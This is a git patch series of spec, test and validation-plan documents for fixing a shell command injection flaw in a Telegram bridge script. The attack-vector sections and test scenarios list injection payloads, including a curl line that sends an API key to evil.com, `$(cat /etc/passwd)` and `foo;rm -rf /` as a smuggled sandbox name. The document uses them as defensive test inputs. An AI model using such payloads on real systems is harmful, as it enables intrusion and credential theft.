From 3a9a5c907b8a157e0fcdae1ce6e5c09b6b78c631 Mon Sep 17 00:00:00 2001
From: Julie Yaunches <jyaunches@nvidia.com>
Date: Tue, 31 Mar 2026 11:55:25 -0400
Subject: [PATCH 01/14] docs: add spec for telegram bridge command injection
 fix

Re-specification for PR #119 which has gone stale.
Fixes #118
---
 .../telegram-bridge-command-injection-fix.md  | 135 ++++++++++++++++++
 1 file changed, 135 insertions(+)
 create mode 100644 .specs/telegram-bridge-command-injection-fix.md

diff --git a/.specs/telegram-bridge-command-injection-fix.md b/.specs/telegram-bridge-command-injection-fix.md
new file mode 100644
index 0000000000..3d93c0ad9a
--- /dev/null
+++ b/.specs/telegram-bridge-command-injection-fix.md
@@ -0,0 +1,135 @@
+# Spec: Fix Command Injection in Telegram Bridge
+
+## Problem Statement
+
+**Issue:** #118 — Command injection vulnerability in `scripts/telegram-bridge.js`
+
+The Telegram bridge interpolates user messages directly into a shell command string passed to SSH. The current escaping (single-quote replacement via `shellQuote`) does not prevent `$()` or backtick expansion, allowing attackers to execute arbitrary commands inside the sandbox and potentially exfiltrate the `NVIDIA_API_KEY`.
+
+### Vulnerable Code Path
+
+```js
+const cmd = `export NVIDIA_API_KEY=${shellQuote(API_KEY)} && nemoclaw-start openclaw agent --agent main --local -m ${shellQuote(message)} --session-id ${shellQuote("tg-" + safeSessionId)}`;
+
+const proc = spawn("ssh", ["-T", "-F", confPath, `openshell-${SANDBOX}`, cmd], {
+  stdio: ["ignore", "pipe", "pipe"],
+});
+```
+
+Even with `shellQuote`, the message is still embedded in a shell command string that gets interpreted by the remote shell, enabling injection via `$()`, backticks, or other shell metacharacters.
+
+### Attack Vector
+
+An attacker who:
+
+1. Has access to a Telegram bot token (or is in the allowed chat list)
+2. Knows the sandbox name
+
+Can send a message like:
+
+- `$(cat /etc/passwd)`
+- `` `whoami` ``
+- `'; curl http://evil.com?key=$NVIDIA_API_KEY #`
+
+This could execute arbitrary commands in the sandbox and exfiltrate credentials.
+
+## Solution
+
+Pass the user message and API key via **stdin** instead of shell string interpolation. The remote script reads these values using `read` and `cat`, then expands them inside double-quoted `"$VAR"` which prevents further shell parsing.
+
+## Phases
+
+### Phase 1: Input Validation Hardening
+
+**Goal:** Add strict validation for `SANDBOX_NAME` and `sessionId` to reject shell metacharacters.
+
+**Changes:**
+
+1. Add explicit regex validation for `SANDBOX_NAME` at startup (alphanumeric, underscore, hyphen only)
+2. Sanitize `sessionId` to strip any non-alphanumeric characters
+3. Return early with error if sessionId is empty after sanitization
+
+**Files:**
+
+- `scripts/telegram-bridge.js`
+
+**Acceptance Criteria:**
+
+- [ ] `SANDBOX_NAME` with metacharacters (e.g., `foo;rm -rf /`) causes startup to exit with error
+- [ ] `sessionId` containing special characters gets sanitized to safe value
+- [ ] Empty sessionId after sanitization returns error response
+
+### Phase 2: Stdin-Based Credential and Message Passing
+
+**Goal:** Eliminate shell injection by passing sensitive data via stdin instead of command string.
+
+**Changes:**
+
+1. Change `stdio` from `["ignore", "pipe", "pipe"]` to `["pipe", "pipe", "pipe"]` to enable stdin
+2. Construct remote script that:
+   - Reads API key from first line of stdin: `read -r NVIDIA_API_KEY`
+   - Exports it: `export NVIDIA_API_KEY`
+   - Reads message from remaining stdin: `MSG=$(cat)`
+   - Executes nemoclaw-start with `"$MSG"` (double-quoted variable)
+3. Write API key + newline to stdin, then message, then close stdin
+4. Remove the `shellQuote` calls for message and API key (no longer needed)
+
+**Files:**
+
+- `scripts/telegram-bridge.js`
+
+**Acceptance Criteria:**
+
+- [ ] Normal messages work correctly — agent responds
+- [ ] Message containing `$(whoami)` is treated as literal text
+- [ ] Message containing backticks is treated as literal text
+- [ ] Message containing single quotes is treated as literal text
+- [ ] `NVIDIA_API_KEY` no longer appears in process arguments (verify via `ps aux`)
+- [ ] API key is successfully read by remote script and used for inference
+
+### Phase 3: Test Coverage
+
+**Goal:** Add unit and integration tests for the security fix.
+
+**Changes:**
+
+1. Add unit tests for input validation (SANDBOX_NAME, sessionId sanitization)
+2. Add integration test that verifies injection payloads are treated as literal text
+3. Add test that API key is not visible in process list
+
+**Files:**
+
+- `test/telegram-bridge.test.js` (new file)
+
+**Acceptance Criteria:**
+
+- [ ] Unit tests pass for validation functions
+- [ ] Integration test confirms `$(...)` in message doesn't execute
+- [ ] Test confirms API key not in process arguments
+- [ ] All existing tests still pass
+
+## Security Considerations
+
+- **Defense in depth:** Even though we're passing via stdin, we still validate inputs
+- **Principle of least privilege:** Credentials should never appear in command lines
+- **Backwards compatibility:** No API changes; existing bot configurations work unchanged
+
+## Test Plan
+
+### Manual Testing
+
+1. Send a normal message via Telegram → agent responds correctly
+2. Send `$(whoami)` → appears literally in response, no command execution
+3. Send message with backticks and single quotes → no injection
+4. Set `SANDBOX_NAME=foo;rm -rf /` → startup exits with error
+5. Run `ps aux | grep NVIDIA_API_KEY` while agent is running → no matches
+
+### Automated Testing
+
+- Unit tests for validation functions
+- Integration tests with mock SSH that captures stdin
+- Verify no shell metacharacters reach shell interpretation
+
+## Rollback Plan
+
+If issues arise, revert the commit. The fix is contained to a single file with clear boundaries.

From 069053c8d33a35fc3f20af49af88b68554dc98aa Mon Sep 17 00:00:00 2001
From: Julie Yaunches <jyaunches@nvidia.com>
Date: Tue, 31 Mar 2026 12:47:13 -0400
Subject: [PATCH 02/14] docs: add test specification and validation plan for
 telegram-bridge-command-injection-fix

---
 .../spec.md                                   | 220 ++++++++++++
 .../tests.md                                  | 316 ++++++++++++++++++
 .../validation.md                             |   0
 3 files changed, 536 insertions(+)
 create mode 100644 .specs/telegram-bridge-command-injection-fix/spec.md
 create mode 100644 .specs/telegram-bridge-command-injection-fix/tests.md
 create mode 100644 .specs/telegram-bridge-command-injection-fix/validation.md

diff --git a/.specs/telegram-bridge-command-injection-fix/spec.md b/.specs/telegram-bridge-command-injection-fix/spec.md
new file mode 100644
index 0000000000..459d2702ca
--- /dev/null
+++ b/.specs/telegram-bridge-command-injection-fix/spec.md
@@ -0,0 +1,220 @@
+# Spec: Fix Command Injection in Telegram Bridge
+
+## Problem Statement
+
+**Issue:** #118 — Command injection vulnerability in `scripts/telegram-bridge.js`
+
+The Telegram bridge interpolates user messages directly into a shell command string passed to SSH. The current escaping (single-quote replacement via `shellQuote`) does not prevent `$()` or backtick expansion, allowing attackers to execute arbitrary commands inside the sandbox and potentially exfiltrate the `NVIDIA_API_KEY`.
+
+### Vulnerable Code Path
+
+```js
+const cmd = `export NVIDIA_API_KEY=${shellQuote(API_KEY)} && nemoclaw-start openclaw agent --agent main --local -m ${shellQuote(message)} --session-id ${shellQuote("tg-" + safeSessionId)}`;
+
+const proc = spawn("ssh", ["-T", "-F", confPath, `openshell-${SANDBOX}`, cmd], {
+  stdio: ["ignore", "pipe", "pipe"],
+});
+```
+
+Even with `shellQuote`, the message is still embedded in a shell command string that gets interpreted by the remote shell, enabling injection via `$()`, backticks, or other shell metacharacters.
+
+### Attack Vector
+
+An attacker who:
+
+1. Has access to the Telegram bot token, OR
+2. Is in a chat that the bot accepts (if `ALLOWED_CHAT_IDS` is unset, **all chats are accepted**)
+
+And knows the sandbox name, can send a message like:
+
+- `$(cat /etc/passwd)` — command substitution
+- `` `whoami` `` — backtick expansion
+- `'; curl http://evil.com?key=$NVIDIA_API_KEY #` — quote escape + exfiltration
+
+This could execute arbitrary commands in the sandbox and exfiltrate credentials.
+
+### Access Control Context
+
+The `ALLOWED_CHAT_IDS` environment variable is an **optional** comma-separated list of Telegram chat IDs:
+
+```js
+const ALLOWED_CHATS = process.env.ALLOWED_CHAT_IDS
+  ? process.env.ALLOWED_CHAT_IDS.split(",").map((s) => s.trim())
+  : null;
+```
+
+If unset, the bot accepts messages from **any** Telegram chat, significantly expanding the attack surface.
+
+## Solution
+
+Pass the user message and API key via **stdin** instead of shell string interpolation. The remote script reads these values using `read` and `cat`, then expands them inside double-quoted `"$VAR"` which prevents further shell parsing.
+
+Additionally, apply defense-in-depth hardening identified in the PR #119 security review.
+
+## Phases
+
+### Phase 1: Input Validation Hardening
+
+**Goal:** Add strict validation for `SANDBOX_NAME` and `sessionId` to reject shell metacharacters and prevent option injection.
+
+**Changes:**
+
+1. Improve `SANDBOX_NAME` regex to require alphanumeric first character: `/^[A-Za-z0-9][A-Za-z0-9_-]*$/`
+   - This prevents option injection (e.g., `-v`, `--help` being interpreted as flags)
+2. Sanitize `sessionId` to strip any non-alphanumeric characters
+3. Return early with error if sessionId is empty after sanitization
+4. Add message length cap of 4096 characters (matches Telegram's own limit)
+
+**Files:**
+
+- `scripts/telegram-bridge.js`
+
+**Acceptance Criteria:**
+
+- [ ] `SANDBOX_NAME` with metacharacters (e.g., `foo;rm -rf /`) causes startup to exit with error
+- [ ] `SANDBOX_NAME` starting with hyphen (e.g., `-v`, `--help`) causes startup to exit with error
+- [ ] `sessionId` containing special characters gets sanitized to safe value
+- [ ] Empty sessionId after sanitization returns error response
+- [ ] Messages longer than 4096 characters are rejected with user-friendly error
+
+### Phase 2: Stdin-Based Credential and Message Passing
+
+**Goal:** Eliminate shell injection by passing sensitive data via stdin instead of command string.
+
+**Changes:**
+
+1. Change `stdio` from `["ignore", "pipe", "pipe"]` to `["pipe", "pipe", "pipe"]` to enable stdin
+2. Construct remote script that:
+   - Reads API key from first line of stdin: `read -r NVIDIA_API_KEY`
+   - Exports it: `export NVIDIA_API_KEY`
+   - Reads message from remaining stdin: `MSG=$(cat)`
+   - Executes nemoclaw-start with `"$MSG"` (double-quoted variable)
+3. Write API key + newline to stdin, then message, then close stdin
+4. Remove the `shellQuote` calls for message and API key (no longer needed)
+
+**Remote script template:**
+
+```bash
+read -r NVIDIA_API_KEY && export NVIDIA_API_KEY && MSG=$(cat) && exec nemoclaw-start openclaw agent --agent main --local -m "$MSG" --session-id "tg-$SESSION_ID"
+```
+
+**Files:**
+
+- `scripts/telegram-bridge.js`
+
+**Acceptance Criteria:**
+
+- [ ] Normal messages work correctly — agent responds
+- [ ] Message containing `$(whoami)` is treated as literal text
+- [ ] Message containing backticks is treated as literal text
+- [ ] Message containing single quotes is treated as literal text
+- [ ] `NVIDIA_API_KEY` no longer appears in process arguments (verify via `ps aux`)
+- [ ] API key is successfully read by remote script and used for inference
+
+### Phase 3: Additional Security Hardening
+
+**Goal:** Address remaining security gaps identified in PR #119 security review.
+
+**Changes:**
+
+1. **Use `execFileSync` instead of `execSync`** for ssh-config call to avoid shell interpretation:
+
+   ```js
+   // Before
+   const sshConfig = execSync(`openshell sandbox ssh-config ${SANDBOX}`, { encoding: "utf-8" });
+
+   // After
+   const sshConfig = execFileSync(OPENSHELL, ["sandbox", "ssh-config", SANDBOX], { encoding: "utf-8" });
+   ```
+
+2. **Use resolved `OPENSHELL` path consistently** — the script already resolves the path at startup but wasn't using it everywhere
+
+3. **Use cryptographically random temp file paths** to prevent symlink race attacks (CWE-377):
+
+   ```js
+   // Before (predictable)
+   const confPath = `/tmp/nemoclaw-tg-ssh-${safeSessionId}.conf`;
+
+   // After (unpredictable + exclusive creation)
+   const confDir = fs.mkdtempSync("/tmp/nemoclaw-tg-ssh-");
+   const confPath = `${confDir}/config`;
+   fs.writeFileSync(confPath, sshConfig, { mode: 0o600 });
+   ```
+
+**Files:**
+
+- `scripts/telegram-bridge.js`
+
+**Acceptance Criteria:**
+
+- [ ] `execFileSync` used for all external command calls (no shell interpretation)
+- [ ] Resolved `OPENSHELL` path used consistently throughout
+- [ ] Temp SSH config files use unpredictable paths
+- [ ] Temp files created with exclusive flag and restrictive permissions (0o600)
+- [ ] Temp files cleaned up after use
+
+### Phase 4: Test Coverage
+
+**Goal:** Add unit and integration tests for the security fix.
+
+**Changes:**
+
+1. Add unit tests for input validation:
+   - `SANDBOX_NAME` regex (valid names, metacharacters, leading hyphens)
+   - `sessionId` sanitization
+   - Message length validation
+2. Add integration test that verifies injection payloads are treated as literal text
+3. Add test that API key is not visible in process list
+4. Add test for temp file cleanup
+
+**Files:**
+
+- `test/telegram-bridge.test.js` (new file)
+
+**Acceptance Criteria:**
+
+- [ ] Unit tests pass for validation functions
+- [ ] Integration test confirms `$(...)` in message doesn't execute
+- [ ] Test confirms API key not in process arguments
+- [ ] Test confirms temp files are cleaned up
+- [ ] All existing tests still pass
+
+## Security Considerations
+
+- **Defense in depth:** Multiple layers — input validation, stdin passing, parameterized execution
+- **Principle of least privilege:** Credentials never appear in command lines or process arguments
+- **Option injection prevention:** SANDBOX_NAME must start with alphanumeric character
+- **Race condition prevention:** Cryptographically random temp file paths with exclusive creation
+- **Backwards compatibility:** No API changes; existing bot configurations work unchanged
+
+## Related PRs
+
+- **PR #119** (upstream): Original fix this spec is based on
+- **PR #320** (upstream): Additional hardening (execFileSync, temp file races, better regex)
+- **PR #617** (upstream): Bridge framework refactor — if merged first, changes apply to `bridge-core.js` instead
+- **PR #699** (upstream): `ALLOWED_CHAT_IDS` warning/opt-in behavior — out of scope for this fix, separate concern
+- **PR #897** (upstream): Env var propagation fix in `bin/nemoclaw.js` — separate file, no conflict
+
+## Test Plan
+
+### Manual Testing
+
+1. Send a normal message via Telegram → agent responds correctly
+2. Send `$(whoami)` → appears literally in response, no command execution
+3. Send message with backticks and single quotes → no injection
+4. Send message longer than 4096 chars → rejected with error
+5. Set `SANDBOX_NAME=foo;rm -rf /` → startup exits with error
+6. Set `SANDBOX_NAME=-v` → startup exits with error
+7. Run `ps aux | grep NVIDIA_API_KEY` while agent is running → no matches
+8. Check `/tmp/` for lingering config files after agent exits → none
+
+### Automated Testing
+
+- Unit tests for validation functions (SANDBOX_NAME, sessionId, message length)
+- Integration tests with mock SSH that captures stdin
+- Verify no shell metacharacters reach shell interpretation
+- Verify temp file cleanup
+
+## Rollback Plan
+
+If issues arise, revert the commit. The fix is contained to a single file with clear boundaries.
diff --git a/.specs/telegram-bridge-command-injection-fix/tests.md b/.specs/telegram-bridge-command-injection-fix/tests.md
new file mode 100644
index 0000000000..835c73d0bd
--- /dev/null
+++ b/.specs/telegram-bridge-command-injection-fix/tests.md
@@ -0,0 +1,316 @@
+# Test Specification: Telegram Bridge Command Injection Fix
+
+This test guide supports TDD implementation of the command injection fix for `scripts/telegram-bridge.js`.
+
+## Test File
+
+**New file:** `test/telegram-bridge.test.js`
+
+## Test Patterns
+
+Following existing project conventions:
+
+- Use Vitest with `describe`, `it`, `expect`
+- ESM imports
+- Source file reading for static analysis tests
+- Mock external dependencies (SSH, child_process)
+
+---
+
+## Phase 1: Input Validation Hardening - Test Guide
+
+**Existing Tests to Modify:** None
+
+**New Tests to Create:**
+
+### 1.1 SANDBOX_NAME Validation
+
+```javascript
+describe("SANDBOX_NAME validation", () => {
+  it("should accept valid alphanumeric names", () => {
+    // Input: "nemoclaw", "my_sandbox", "test-123"
+    // Expected: No error thrown
+    // Covers: Valid SANDBOX_NAME patterns
+  });
+
+  it("should reject names with shell metacharacters", () => {
+    // Input: "foo;rm -rf /", "test$(whoami)", "sandbox`id`"
+    // Expected: validateName throws or returns error
+    // Covers: SANDBOX_NAME with metacharacters causes startup to exit with error
+  });
+
+  it("should reject names starting with hyphen (option injection)", () => {
+    // Input: "-v", "--help", "-rf"
+    // Expected: validateName throws or returns error
+    // Covers: SANDBOX_NAME starting with hyphen causes startup to exit with error
+  });
+
+  it("should reject empty names", () => {
+    // Input: "", null, undefined
+    // Expected: validateName throws or returns error
+    // Covers: Edge case handling
+  });
+});
+```
+
+### 1.2 sessionId Sanitization
+
+```javascript
+describe("sessionId sanitization", () => {
+  it("should preserve alphanumeric characters", () => {
+    // Input: "12345678", "abc123"
+    // Expected: Same value returned
+    // Covers: Valid sessionId passes through
+  });
+
+  it("should strip special characters", () => {
+    // Input: "123;rm -rf", "abc$(whoami)", "test`id`"
+    // Expected: "123rmrf", "abcwhoami", "testid"
+    // Covers: sessionId containing special characters gets sanitized
+  });
+
+  it("should handle empty result after sanitization", () => {
+    // Input: ";;;", "$()", "``"
+    // Expected: Error returned or default value used
+    // Covers: Empty sessionId after sanitization returns error response
+  });
+});
+```
+
+### 1.3 Message Length Validation
+
+```javascript
+describe("message length validation", () => {
+  it("should accept messages within limit", () => {
+    // Input: "Hello", "A".repeat(4096)
+    // Expected: Message processed normally
+    // Covers: Normal messages work
+  });
+
+  it("should reject messages exceeding 4096 characters", () => {
+    // Input: "A".repeat(4097)
+    // Expected: Error response returned
+    // Covers: Messages longer than 4096 characters rejected with user-friendly error
+  });
+});
+```
+
+**Test Implementation Notes:**
+
+- Extract validation functions from telegram-bridge.js for unit testing
+- Or use source code scanning similar to credential-exposure.test.js
+
+---
+
+## Phase 2: Stdin-Based Credential and Message Passing - Test Guide
+
+**Existing Tests to Modify:** None
+
+**New Tests to Create:**
+
+### 2.1 Stdin Protocol
+
+```javascript
+describe("stdin-based message passing", () => {
+  it("should write API key as first line of stdin", () => {
+    // Setup: Mock spawn, capture stdin writes
+    // Input: API_KEY="test-key", message="hello"
+    // Expected: First write is "test-key\n"
+    // Covers: API key written to stdin
+  });
+
+  it("should write message after API key", () => {
+    // Setup: Mock spawn, capture stdin writes
+    // Input: API_KEY="test-key", message="hello world"
+    // Expected: Second write is "hello world", then stdin.end()
+    // Covers: Message written to stdin
+  });
+
+  it("should close stdin after writing", () => {
+    // Setup: Mock spawn, track stdin.end() call
+    // Expected: stdin.end() called after writes
+    // Covers: Proper stdin lifecycle
+  });
+});
+```
+
+### 2.2 Command Injection Prevention
+
+```javascript
+describe("command injection prevention", () => {
+  it("should treat $() as literal text", () => {
+    // Setup: Mock SSH that echoes stdin back
+    // Input: message="$(whoami)"
+    // Expected: Message appears literally, no command execution
+    // Covers: Message containing $(whoami) is treated as literal text
+  });
+
+  it("should treat backticks as literal text", () => {
+    // Setup: Mock SSH that echoes stdin back
+    // Input: message="`id`"
+    // Expected: Message appears literally, no command execution
+    // Covers: Message containing backticks is treated as literal text
+  });
+
+  it("should treat single quotes as literal text", () => {
+    // Setup: Mock SSH that echoes stdin back
+    // Input: message="'; curl evil.com #"
+    // Expected: Message appears literally, no command execution
+    // Covers: Message containing single quotes is treated as literal text
+  });
+});
+```
+
+### 2.3 API Key Not in Process Arguments
+
+```javascript
+describe("API key protection", () => {
+  it("should not include API key in spawn arguments", () => {
+    // Setup: Mock spawn, capture arguments
+    // Input: API_KEY="nvapi-secret-key"
+    // Expected: "nvapi-secret-key" not in any spawn argument
+    // Covers: NVIDIA_API_KEY no longer appears in process arguments
+  });
+
+  it("should construct remote script without embedded credentials", () => {
+    // Setup: Inspect the cmd string passed to spawn
+    // Expected: cmd contains 'read -r NVIDIA_API_KEY' not the actual key
+    // Covers: Defense in depth
+  });
+});
+```
+
+**Test Implementation Notes:**
+
+- Mock `spawn` from `child_process` to capture stdin writes
+- Use `vi.spyOn` or manual mock replacement
+- Consider creating a mock SSH helper
+
+---
+
+## Phase 3: Additional Security Hardening - Test Guide
+
+**Existing Tests to Modify:** None
+
+**New Tests to Create:**
+
+### 3.1 execFileSync Usage
+
+```javascript
+describe("execFileSync for ssh-config", () => {
+  it("should use execFileSync instead of execSync", () => {
+    // Method: Source code scanning
+    // Expected: No execSync calls with string interpolation
+    // Covers: execFileSync used for all external command calls
+    const src = fs.readFileSync(TELEGRAM_BRIDGE_JS, "utf-8");
+    expect(src).not.toMatch(/execSync\s*\(/);
+    expect(src).toMatch(/execFileSync\s*\(\s*OPENSHELL/);
+  });
+
+  it("should use resolved OPENSHELL path", () => {
+    // Method: Source code scanning
+    // Expected: OPENSHELL variable used, not bare "openshell" string
+    // Covers: Resolved OPENSHELL path used consistently throughout
+    const src = fs.readFileSync(TELEGRAM_BRIDGE_JS, "utf-8");
+    expect(src).not.toMatch(/execFileSync\s*\(\s*["']openshell["']/);
+  });
+});
+```
+
+### 3.2 Temp File Security
+
+```javascript
+describe("temp file security", () => {
+  it("should use mkdtempSync for unpredictable paths", () => {
+    // Method: Source code scanning
+    // Expected: fs.mkdtempSync used for temp directory
+    // Covers: Temp SSH config files use unpredictable paths
+    const src = fs.readFileSync(TELEGRAM_BRIDGE_JS, "utf-8");
+    expect(src).toMatch(/mkdtempSync\s*\(/);
+  });
+
+  it("should not use predictable temp file names", () => {
+    // Method: Source code scanning
+    // Expected: No /tmp/nemoclaw-tg-ssh-${sessionId} pattern
+    // Covers: No symlink race vulnerability
+    const src = fs.readFileSync(TELEGRAM_BRIDGE_JS, "utf-8");
+    expect(src).not.toMatch(/\/tmp\/nemoclaw-tg-ssh-\$\{/);
+  });
+
+  it("should set restrictive permissions on temp files", () => {
+    // Method: Source code scanning
+    // Expected: mode: 0o600 in writeFileSync options
+    // Covers: Temp files created with restrictive permissions
+    const src = fs.readFileSync(TELEGRAM_BRIDGE_JS, "utf-8");
+    expect(src).toMatch(/mode:\s*0o600/);
+  });
+
+  it("should clean up temp files after use", () => {
+    // Method: Source code scanning
+    // Expected: unlinkSync and rmdirSync calls in finally/cleanup
+    // Covers: Temp files cleaned up after use
+    const src = fs.readFileSync(TELEGRAM_BRIDGE_JS, "utf-8");
+    expect(src).toMatch(/unlinkSync\s*\(\s*confPath\s*\)/);
+    expect(src).toMatch(/rmdirSync\s*\(\s*confDir\s*\)/);
+  });
+});
+```
+
+**Test Implementation Notes:**
+
+- Use source code scanning pattern from credential-exposure.test.js
+- Static analysis catches patterns without needing runtime mocks
+
+---
+
+## Phase 4: Test Coverage - Test Guide
+
+This phase implements the tests defined above.
+
+**Acceptance Criteria Verification:**
+
+```javascript
+describe("security fix verification", () => {
+  it("all validation unit tests pass", () => {
+    // Meta-test: Run Phase 1 tests
+  });
+
+  it("injection payloads treated as literal text", () => {
+    // Meta-test: Run Phase 2 injection tests
+  });
+
+  it("API key not in process arguments", () => {
+    // Meta-test: Run Phase 2 API key tests
+  });
+
+  it("temp files cleaned up", () => {
+    // Meta-test: Run Phase 3 temp file tests
+  });
+
+  it("existing tests still pass", () => {
+    // Run: npm test
+    // Expected: All tests pass including new ones
+  });
+});
+```
+
+---
+
+## Integration Test (Optional)
+
+If end-to-end testing is needed:
+
+```javascript
+describe("telegram-bridge integration", () => {
+  it("should process normal message through mock SSH", async () => {
+    // Setup:
+    // - Mock Telegram API responses
+    // - Mock SSH that captures stdin and returns response
+    // - Start bridge in test mode
+    // Input: Simulated Telegram message "Hello"
+    // Expected: Response returned without injection
+  });
+});
+```
+
+**Note:** Integration tests may be deferred to manual testing given the complexity of mocking Telegram + SSH.
diff --git a/.specs/telegram-bridge-command-injection-fix/validation.md b/.specs/telegram-bridge-command-injection-fix/validation.md
new file mode 100644
index 0000000000..e69de29bb2

From 20a368c52ac2b3bed8d5d10dce427ddef3d9f75f Mon Sep 17 00:00:00 2001
From: Julie Yaunches <jyaunches@nvidia.com>
Date: Tue, 31 Mar 2026 13:09:51 -0400
Subject: [PATCH 03/14] docs: update validation plan to use existing e2e-brev
 telegram-injection tests

---
 .../validation.md                             | 190 ++++++++++++++++++
 1 file changed, 190 insertions(+)

diff --git a/.specs/telegram-bridge-command-injection-fix/validation.md b/.specs/telegram-bridge-command-injection-fix/validation.md
index e69de29bb2..42568b4558 100644
--- a/.specs/telegram-bridge-command-injection-fix/validation.md
+++ b/.specs/telegram-bridge-command-injection-fix/validation.md
@@ -0,0 +1,190 @@
+# Validation Plan: Telegram Bridge Command Injection Fix
+
+Generated from: `.specs/telegram-bridge-command-injection-fix/spec.md`
+Test Spec: `.specs/telegram-bridge-command-injection-fix/tests.md`
+
+## Overview
+
+**Feature**: Fix command injection vulnerability in Telegram bridge by passing user messages via stdin instead of shell interpolation, plus defense-in-depth hardening.
+
+**Primary Validation**: Run `test/e2e/test-telegram-injection.sh` via brev-e2e test suite
+
+## Validation Strategy
+
+The existing E2E test `test/e2e/test-telegram-injection.sh` provides comprehensive validation of the security fix. This test:
+
+1. Creates a real sandbox environment on Brev
+2. Tests actual SSH + stdin message passing
+3. Verifies injection payloads are treated as literal text
+4. Confirms API key doesn't leak to process table
+5. Validates SANDBOX_NAME input validation
+
+### Test Coverage Mapping
+
+| E2E Test | Spec Phase | Acceptance Criteria |
+|----------|------------|---------------------|
+| T1: `$(command)` substitution | Phase 2 | Message containing `$(whoami)` treated as literal |
+| T2: Backtick injection | Phase 2 | Message containing backticks treated as literal |
+| T3: Single-quote breakout | Phase 2 | Message containing single quotes treated as literal |
+| T4: `${NVIDIA_API_KEY}` expansion | Phase 2 | API key not expanded in message |
+| T5: Process table leak check | Phase 2 | API key not in process arguments |
+| T6: SANDBOX_NAME metacharacters | Phase 1 | SANDBOX_NAME with metacharacters rejected |
+| T7: Leading-hyphen option injection | Phase 1 | SANDBOX_NAME starting with hyphen rejected |
+| T8: Normal message regression | Phase 2 | Normal messages work correctly |
+
+---
+
+## Validation Execution
+
+### Prerequisites
+
+```bash
+# Required environment variables
+export BREV_API_TOKEN="<refresh_token from ~/.brev/credentials.json>"
+export NVIDIA_API_KEY="<your nvidia api key>"
+export GITHUB_TOKEN="<your github token>"
+export INSTANCE_NAME="telegram-injection-fix-$(date +%s)"
+export TEST_SUITE="telegram-injection"
+```
+
+### Run Validation
+
+```bash
+# Run the telegram-injection E2E test via brev
+npx vitest run --project e2e-brev
+```
+
+### Expected Output
+
+```text
+✓ telegram bridge injection suite passes on remote VM
+
+  Telegram Injection Test Results:
+    Passed:  12+
+    Failed:  0
+    Skipped: 0
+```
+
+---
+
+## Validation Scenarios (from test-telegram-injection.sh)
+
+### Phase 0: Prerequisites [STATUS: pending]
+
+**Validates**: Test environment is ready
+
+- NVIDIA_API_KEY is set
+- openshell found on PATH
+- nemoclaw found on PATH
+- Sandbox is running
+
+---
+
+### Phase 1: Command Substitution Injection [STATUS: pending]
+
+#### Scenario T1: $(command) Not Executed
+
+**Given**: A message containing `$(touch /tmp/injection-proof-t1 && echo INJECTED)`
+**When**: Message is passed via stdin to sandbox
+**Then**: `/tmp/injection-proof-t1` is NOT created (command not executed)
+
+#### Scenario T2: Backtick Command Not Executed
+
+**Given**: A message containing `` `touch /tmp/injection-proof-t2` ``
+**When**: Message is passed via stdin to sandbox
+**Then**: `/tmp/injection-proof-t2` is NOT created (command not executed)
+
+---
+
+### Phase 2: Quote Breakout Injection [STATUS: pending]
+
+#### Scenario T3: Single-Quote Breakout Prevented
+
+**Given**: A message containing `'; touch /tmp/injection-proof-t3; echo '`
+**When**: Message is passed via stdin to sandbox
+**Then**: `/tmp/injection-proof-t3` is NOT created (breakout prevented)
+
+---
+
+### Phase 3: Parameter Expansion [STATUS: pending]
+
+#### Scenario T4: ${NVIDIA_API_KEY} Not Expanded
+
+**Given**: A message containing `${NVIDIA_API_KEY}`
+**When**: Message is echoed back from sandbox
+**Then**: Result contains literal `${NVIDIA_API_KEY}`, NOT the actual key value
+
+---
+
+### Phase 4: Process Table Leak Check [STATUS: pending]
+
+#### Scenario T5: API Key Not in Process Table
+
+**Given**: NVIDIA_API_KEY is set in environment
+**When**: Checking `ps aux` on host and sandbox
+**Then**: API key value does not appear in any process arguments
+
+---
+
+### Phase 5: SANDBOX_NAME Validation [STATUS: pending]
+
+#### Scenario T6: Metacharacters Rejected
+
+**Given**: SANDBOX_NAME set to `foo;rm -rf /`
+**When**: validateName() is called
+**Then**: Validation throws error, name rejected
+
+#### Scenario T7: Leading Hyphen Rejected
+
+**Given**: SANDBOX_NAME set to `--help`
+**When**: validateName() is called
+**Then**: Validation throws error, option injection prevented
+
+#### Additional Invalid Names Tested
+
+- `$(whoami)` → rejected
+- `` `id` `` → rejected
+- `foo bar` → rejected
+- `../etc/passwd` → rejected
+- `UPPERCASE` → rejected
+
+---
+
+### Phase 6: Normal Message Regression [STATUS: pending]
+
+#### Scenario T8: Normal Message Works
+
+**Given**: A normal message "Hello, what is two plus two?"
+**When**: Message is passed via stdin to sandbox
+**Then**: Message is echoed back correctly
+
+#### Scenario T8b: Special Characters Handled
+
+**Given**: A message with safe special chars "What's the meaning of life? It costs $5 & is 100% free!"
+**When**: Message is processed
+**Then**: No errors, message processed successfully
+
+---
+
+## Summary
+
+| Phase | Tests | Status |
+|-------|-------|--------|
+| Phase 0: Prerequisites | 4 | pending |
+| Phase 1: Command Substitution | 2 | pending |
+| Phase 2: Quote Breakout | 1 | pending |
+| Phase 3: Parameter Expansion | 1 | pending |
+| Phase 4: Process Table | 1 | pending |
+| Phase 5: SANDBOX_NAME Validation | 7 | pending |
+| Phase 6: Normal Message Regression | 2 | pending |
+| **Total** | **18** | **pending** |
+
+---
+
+## Post-Validation
+
+After E2E tests pass:
+
+1. Run unit tests: `npm test`
+2. Run linters: `make check`
+3. Verify no regressions in existing tests

From 6fd3e2cf921e5734111dfb944b4f9ab6fe95116d Mon Sep 17 00:00:00 2001
From: Julie Yaunches <jyaunches@nvidia.com>
Date: Tue, 31 Mar 2026 13:14:06 -0400
Subject: [PATCH 04/14] docs: update spec to address PR #1092 feedback - E2E
 tests must exercise real runAgentInSandbox()

---
 .specs/telegram-bridge-command-injection-fix/spec.md | 12 +++++++++++-
 .../validation.md                                    |  4 ++++
 2 files changed, 15 insertions(+), 1 deletion(-)

diff --git a/.specs/telegram-bridge-command-injection-fix/spec.md b/.specs/telegram-bridge-command-injection-fix/spec.md
index 459d2702ca..3fee93dff1 100644
--- a/.specs/telegram-bridge-command-injection-fix/spec.md
+++ b/.specs/telegram-bridge-command-injection-fix/spec.md
@@ -155,7 +155,9 @@ read -r NVIDIA_API_KEY && export NVIDIA_API_KEY && MSG=$(cat) && exec nemoclaw-s
 
 ### Phase 4: Test Coverage
 
-**Goal:** Add unit and integration tests for the security fix.
+**Goal:** Add unit and integration tests for the security fix, and fix E2E test to exercise real code paths.
+
